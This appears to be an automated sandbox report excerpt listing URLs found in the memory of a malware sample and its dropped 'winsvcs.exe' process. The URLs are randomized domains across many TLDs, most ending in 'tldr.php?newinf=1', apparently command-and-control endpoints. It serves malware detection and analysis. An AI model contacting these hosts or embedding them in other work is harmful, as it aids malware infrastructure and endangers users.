Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.net/tldr.php?newinf=1G
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.ru/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.ru/tldr.php?newinf=1#2p
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.su/tldr.php?newinf=1oh
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.com/tldr.php?newinf=17
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.in/tldr.php?newinf=1Dh
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.net/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/tldr.php?newinf=1=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.su/tldr.php?newinf=1s1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1a
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1r
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.com/tldr.php?newinf=1nj
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.in/tldr.php?newinf=19h
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.net/tldr.php?newinf=1A
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://srndndubsbsifurfd.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://srndndubsbsifurfd.su/
